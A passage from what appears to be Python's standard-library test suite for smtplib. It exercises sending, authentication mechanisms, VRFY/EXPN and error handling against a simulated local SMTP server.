smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('[email protected]'), expected)
self.assertEqual(smtp.verify('[email protected]'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds as figuring out
# exactly what IP address format is put there is not easy (and
# irrelevant to our test). Typically 127.0.0.1 or ::1, but it is
# not always the same as socket.gethostbyname(HOST). :(
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = '[email protected]'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <[email protected]>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<[email protected]>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: [email protected]$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'[email protected]'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = '[email protected]'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: [email protected]$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = '[email protected]'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='[email protected]', to_addrs='[email protected]')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: [email protected]$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'[email protected]'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# the Sender header overrides From when choosing the envelope sender
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = '[email protected]'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: [email protected]$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = '[email protected]'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <[email protected]>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = '[email protected]'
m['Resent-To'] = 'Martha <[email protected]>, Jeff'
m['Resent-Bcc'] = '[email protected]'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: [email protected]$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('[email protected]', 'Jeff', '[email protected]'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = '[email protected]'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <[email protected]>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = '[email protected]'
m['Resent-To'] = 'Martha <[email protected]>, Jeff'
m['Resent-Bcc'] = '[email protected]'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = '[email protected]'
m['Resent-From'] = 'Martha <[email protected]>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises OSError
self.assertRaises(OSError, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(OSError, smtplib.SMTP,
"localhost:bogus")
def testSockAttributeExists(self):
# check that sock attribute is present outside of a connect() call
# (regression test, the previous behavior raised an
# AttributeError: 'SMTP' object has no attribute 'sock')
with smtplib.SMTP() as smtp:
self.assertIsNone(smtp.sock)
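# DefaultArgumentsTests checks which mail options send_message() hands to
# sendmail() when the message requires SMTPUTF8 (its setUp() builds a message
# whose From header contains non-ASCII): the options must include SMTPUTF8 and
# BODY=8BITMIME, and a caller-supplied mail_options list must not be mutated
# between calls.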
class DefaultArgumentsTests(unittest.TestCase):
def setUp(self):
self.msg = EmailMessage()
self.msg['From'] = 'Páolo <fő[email protected]>'
self.smtp = smtplib.SMTP()
self.smtp.ehlo = Mock(return_value=(200, 'OK'))
self.smtp.has_extn, self.smtp.sendmail = Mock(), Mock()
def testSendMessage(self):
expected_mail_options = ('SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg)
self.smtp.send_message(self.msg)
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
self.assertEqual(self.smtp.sendmail.call_args_list[1][0][3],
expected_mail_options)
def testSendMessageWithMailOptions(self):
mail_options = ['STARTTLS']
expected_mail_options = ('STARTTLS', 'SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg, None, None, mail_options)
self.assertEqual(mail_options, ['STARTTLS'])
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
# test response of client to a non-successful HELO message
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
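# TooLongLineTests feeds the client a reply far longer than smtplib._MAXLINE
# (the cap smtplib puts on a single response line) through the server() helper
# defined near the top of this file; SMTP.getreply() is expected to give up
# with SMTPResponseException instead of buffering the oversized line.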
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
def setUp(self):
self.thread_key = threading_setup()
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = socket_helper.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'[email protected]':'John A',
'[email protected]':'Sally B',
'[email protected]':'Ruth C',
}
sim_auth = ('[email protected]', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_lists = {'list-1':['[email protected]','[email protected]'],
'list-2':['[email protected]',],
}
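# Fixture data for the simulated server below: sim_users maps an address to
# the display name returned by VRFY, sim_lists maps a mailing-list name to its
# members for EXPN, sim_auth is the username/password pair the AUTH mechanisms
# accept, and sim_cram_md5_challenge is the fixed base64 challenge handed out
# for CRAM-MD5.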
# Simulated SMTP channel & server
class ResponseException(Exception): pass
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
AUTH = 99 # Add protocol state to enable auth testing.
authenticated_user = None
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
# AUTH related stuff. It would be nice if support for this were in smtpd.
def found_terminator(self):
if self.smtp_state == self.AUTH:
line = self._emptystring.join(self.received_lines)
print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
self.received_lines = []
try:
self.auth_object(line)
except ResponseException as e:
self.smtp_state = self.COMMAND
self.push('%s %s' % (e.smtp_code, e.smtp_error))
return
super().found_terminator()
def smtp_AUTH(self, arg):
if not self.seen_greeting:
self.push('503 Error: send EHLO first')
return
if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
self.push('500 Error: command "AUTH" not recognized')
return
if self.authenticated_user is not None:
self.push(
'503 Bad sequence of commands: already authenticated')
return
args = arg.split()
if len(args) not in [1, 2]:
self.push('501 Syntax: AUTH <mechanism> [initial-response]')
return
auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
try:
self.auth_object = getattr(self, auth_object_name)
except AttributeError:
self.push('504 Command parameter not implemented: unsupported '
' authentication mechanism {!r}'.format(auth_object_name))
return
self.smtp_state = self.AUTH
self.auth_object(args[1] if len(args) == 2 else None)
def _authenticated(self, user, valid):
if valid:
self.authenticated_user = user
self.push('235 Authentication Succeeded')
else:
self.push('535 Authentication credentials invalid')
self.smtp_state = self.COMMAND
def _decode_base64(self, string):
return base64.decodebytes(string.encode('ascii')).decode('utf-8')
def _auth_plain(self, arg=None):
if arg is None:
self.push('334 ')
else:
logpass = self._decode_base64(arg)
try:
*_, user, password = logpass.split('\0')
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
' failed: {}'.format(logpass, e))
return
self._authenticated(user, password == sim_auth[1])
def _auth_login(self, arg=None):
if arg is None:
# base64 encoded 'Username:'
self.push('334 VXNlcm5hbWU6')
elif not hasattr(self, '_auth_login_user'):
self._auth_login_user = self._decode_base64(arg)
# base64 encoded 'Password:'
self.push('334 UGFzc3dvcmQ6')
else:
password = self._decode_base64(arg)
self._authenticated(self._auth_login_user, password == sim_auth[1])
del self._auth_login_user
def _auth_buggy(self, arg=None):
# This AUTH mechanism will 'trap' the client in a never-ending 334 exchange.
# base64 encoded 'BuGgYbUgGy'
self.push('334 QnVHZ1liVWdHeQ==')
def _auth_cram_md5(self, arg=None):
if arg is None:
self.push('334 {}'.format(sim_cram_md5_challenge))
else:
logpass = self._decode_base64(arg)
try:
user, hashed_pass = logpass.split()
except ValueError as e:
self.push('535 Splitting response {!r} into user and password '
'failed: {}'.format(logpass, e))
return False
valid_hashed_pass = hmac.HMAC(
sim_auth[1].encode('ascii'),
self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
'md5').hexdigest()
self._authenticated(user, hashed_pass == valid_hashed_pass)
# end AUTH related stuff.
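# Rough shape of the CRAM-MD5 exchange verified above (illustrative only): the
# server sends the fixed base64 challenge, the client replies with
# base64("<user> " + hex(HMAC-MD5(password, decoded challenge))), and
# _auth_cram_md5() recomputes that HMAC from sim_auth[1] to decide between
# a 235 success and a 535 failure.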
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
self._addresses = {}
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
self._addresses['from'] = mailfrom
self._addresses['tos'] = rcpttos
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
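# Features registered with add_feature() end up in SimSMTPChannel._extrafeatures
# and are spliced into the EHLO response, so a test can opt into an extension
# with a single call before connecting, e.g. (illustrative):
#
#     self.serv.add_feature("AUTH PLAIN")
#     smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost')
#     smtp.login(*sim_auth)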
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for addr_spec, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(addr_spec)),
"ascii"))
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = '[email protected]'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN_initial_response_ok(self):
self.serv.add_feature("AUTH LOGIN")
with smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT) as smtp:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_login")
resp = smtp.auth("LOGIN", smtp.auth_login, initial_response_ok=True)
self.assertEqual(resp, (235, b'Authentication Succeeded'))
def testAUTH_LOGIN_initial_response_notok(self):
self.serv.add_feature("AUTH LOGIN")
with smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT) as smtp:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_login")
resp = smtp.auth("LOGIN", smtp.auth_login, initial_response_ok=False)
self.assertEqual(resp, (235, b'Authentication Succeeded'))
def testAUTH_BUGGY(self):
self.serv.add_feature("AUTH BUGGY")
def auth_buggy(challenge=None):
self.assertEqual(b"BuGgYbUgGy", challenge)
return "\0"
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT
)
try:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_buggy")
expect = r"^Server AUTH mechanism infinite loop.*"
with self.assertRaisesRegex(smtplib.SMTPException, expect) as cm:
smtp.auth("BUGGY", auth_buggy, initial_response_ok=False)
finally:
smtp.close()
@hashlib_helper.requires_hashdigest('md5')
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
@hashlib_helper.requires_hashdigest('md5')
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'PLAIN', 'LOGIN'}
try:
hashlib.md5()
except ValueError:
pass
else:
supported.add('CRAM-MD5')
for mechanism in supported:
self.serv.add_feature("AUTH {}".format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
def test__rset_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
